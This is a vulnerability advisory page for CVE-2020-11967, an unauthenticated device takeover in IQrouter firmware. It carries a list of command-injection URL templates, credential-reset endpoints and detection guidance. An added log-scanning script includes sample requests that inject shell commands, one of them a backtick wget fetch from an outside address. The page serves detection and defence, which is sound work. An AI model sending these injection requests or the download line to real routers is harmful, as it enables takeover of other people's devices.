CVE-2020-11967
published 2020-04-21


Priority: P265 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 3.19% (86.5th percentile)
In IQrouter through 3.3.1, remote attackers can control the device (restart network, reboot, upgrade, reset) because of Incorrect Access Control. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”

Affected

1 range
Vendor: evenroute · Product: iqrouter_firmware · Version range: <= 3.3.1 · Fixed in: (none listed)

Detection & IOCs (extracted from sources)

url  /cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'
url  /cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'
url  /cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2
url  /cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2
url  /cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'
url  /cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2
url  /cgi-bin/luci/er/screen4?save_isp='`{}`
url  /cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'
url  /cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'
url  /cgi-bin/luci/er/screen10?set_security_question='`{}`'
url  /cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1
url  /cgi-bin/luci/er/screen1?zonename='`{}`'
url  /cgi-bin/luci/er/register?email=`{}`
url  /cgi-bin/luci/er/reboot_link?link='`{}`'
url  /cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/
url  /cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/
url  /cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/
url  /cgi-bin/luci/er/diag_set_device_name/'`{}`'/
url  /cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/
url  /cgi-bin/luci/er/advanced_link?link='`{}`'
url  /cgi-bin/luci/er/reboot_link?reboot=1
url  /cgi-bin/luci/er/screen2?reboot=1
url  /cgi-bin/luci/er/index?reset_config=1
url  /cgi-bin/luci/er/screen7?upgrade=1
url  /cgi-bin/luci/er/vlanTag?restart_network=1
url  /cgi-bin/luci/er/get_syslog
url  /cgi-bin/luci/er/diag_set_password/c00lpasswd/
url  /cgi-bin/luci/er/reset_password/
url  /cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123
url  /cgi-bin/luci/er/diag_iperf_cmd/start
url  /cgi-bin/luci/er/diag_iperf_cmd/stop
  • All vulnerable CGI endpoints are under /cgi-bin/luci/er/ and require no authentication on unconfigured devices; monitor for unauthenticated HTTP GET requests to any path matching /cgi-bin/luci/er/* from external or untrusted sources.
  • Shell command injection is delivered via backtick syntax (e.g., '`<cmd>`') in GET parameters; detect HTTP requests to /cgi-bin/luci/er/* containing backtick characters, literal or URL-encoded as %60, in query strings or URL path segments.
  • The exploit uses ${IFS} as a space substitute in injected shell commands; alert on literal or URL-encoded ${IFS} appearing in request parameters targeting /cgi-bin/luci/er/* endpoints.
  • Unauthenticated access to /cgi-bin/luci/er/reset_password/ or /cgi-bin/luci/er/diag_set_password/* indicates an attempt to take over root credentials; treat any such request as a high-severity incident.
  • Command output is exfiltrated by reading /cgi-bin/luci/er/get_syslog after injecting via /cgi-bin/luci/er/register?email=; correlate a request to register with a subsequent GET to get_syslog from the same source IP.
  • The vendor states the vulnerability only applies to brand-new, unconfigured devices; once the mandatory initial setup (including setting a secure password) is completed, the unauthenticated access is no longer present.
  • The exploit targets IQrouter firmware versions up to and including 3.3.1; devices on later firmware or with completed setup are not affected by the unauthenticated control endpoints.
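The following script is an added example, not code from the page's sources, the vendor, or the exploit author. It applies the detection heuristics above to web-server access-log lines: it URL-decodes each request target so that %60 (backtick) and %24%7BIFS%7D (${IFS}) are caught, tags requests under /cgi-bin/luci/er/ by the indicator they match, and correlates a backtick-bearing register request with a later get_syslog read from the same source IP. The sample log lines, IP addresses, timestamps, user agents and the trusted-network filter are constructed for illustration; the function names are this example's own. Note that an access log does not show whether the device was configured or the request authenticated, so the source-address filter stands in for the "external/untrusted" condition.

```python
"""Detection logic for CVE-2020-11967-style requests to /cgi-bin/luci/er/*.

Added example, not part of the original page or the vendor's code.
The log lines are constructed, not captured from a real device.
"""
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Constructed combined-log-format lines (hypothetical addresses and times).
SAMPLE_LOG = """\
203.0.113.7 - - [21/Apr/2020:10:00:01 +0000] "GET /cgi-bin/luci/er/register?email=`id${IFS}>/tmp/o` HTTP/1.1" 200 12 "-" "python-requests/2.23"
203.0.113.7 - - [21/Apr/2020:10:00:02 +0000] "GET /cgi-bin/luci/er/get_syslog HTTP/1.1" 200 8812 "-" "python-requests/2.23"
198.51.100.9 - - [21/Apr/2020:10:05:00 +0000] "GET /cgi-bin/luci/er/diag_set_password/c00lpasswd/ HTTP/1.1" 200 0 "-" "curl/7.68.0"
192.0.2.4 - - [21/Apr/2020:10:06:00 +0000] "GET /cgi-bin/luci/er/screen2?reboot=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.4 - - [21/Apr/2020:10:06:30 +0000] "GET /cgi-bin/luci/admin/status HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Apr/2020:10:07:00 +0000] "GET /cgi-bin/luci/er/vlanTag?vlan_tag=%27%60wget%24%7BIFS%7Dhttp://198.51.100.1/a%60%27 HTTP/1.1" 200 12 "-" "python-requests/2.23"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ER_PREFIX = "/cgi-bin/luci/er/"
CRED_ENDPOINTS = ("reset_password", "diag_set_password")
CONTROL_PARAMS = ("reboot=1", "reset_config=1", "upgrade=1", "restart_network=1")


def parse_line(line):
    """Parse one access-log line; the target is URL-decoded so encoded
    backticks (%60) and ${IFS} (%24%7BIFS%7D) are visible to the checks."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["target"] = unquote(req["target"])
    return req


def classify(req):
    """Return the indicator tags one request matches (empty if not /er/)."""
    target = req["target"]
    if not target.startswith(ER_PREFIX):
        return []
    tags = ["er_endpoint"]                     # any /cgi-bin/luci/er/* access
    if "`" in target:
        tags.append("backtick_injection")      # '`<cmd>`' in query or path
    if "${IFS}" in target:
        tags.append("ifs_space_substitute")    # space substitute in injected cmd
    if any(e in target for e in CRED_ENDPOINTS):
        tags.append("credential_takeover")     # reset_password / diag_set_password
    if any(p in target for p in CONTROL_PARAMS):
        tags.append("device_control")          # reboot / reset / upgrade / restart
    return tags


def analyze(log_text, trusted_nets=()):
    """Tag every suspicious request and correlate register -> get_syslog.

    trusted_nets: CIDR strings whose sources are ignored (e.g. the LAN that
    legitimately completes first-time setup). Returns (ip, target, tags) tuples.
    """
    nets = [ip_network(n) for n in trusted_nets]
    injected_from = set()                      # IPs that sent a backtick to register
    alerts = []
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None or any(ip_address(req["ip"]) in n for n in nets):
            continue
        tags = classify(req)
        path = req["target"].split("?", 1)[0]
        if path == ER_PREFIX + "register" and "backtick_injection" in tags:
            injected_from.add(req["ip"])
        if path == ER_PREFIX + "get_syslog" and req["ip"] in injected_from:
            tags.append("syslog_exfil_after_injection")
        if tags:
            alerts.append((req["ip"], req["target"], tags))
    return alerts


if __name__ == "__main__":
    for ip, target, tags in analyze(SAMPLE_LOG):
        print(ip, ",".join(tags), target)
```

Feeding a real router or reverse-proxy log in place of SAMPLE_LOG is the only change needed; pass the management LAN as a trusted network to suppress the setup traffic the vendor describes, and treat any remaining credential_takeover or syslog_exfil_after_injection hit as a high-severity event.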

CVSS provenance

NVD v3.1: 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 9.0 CRITICAL · AV:N/AC:L/Au:N/C:P/I:P/A:C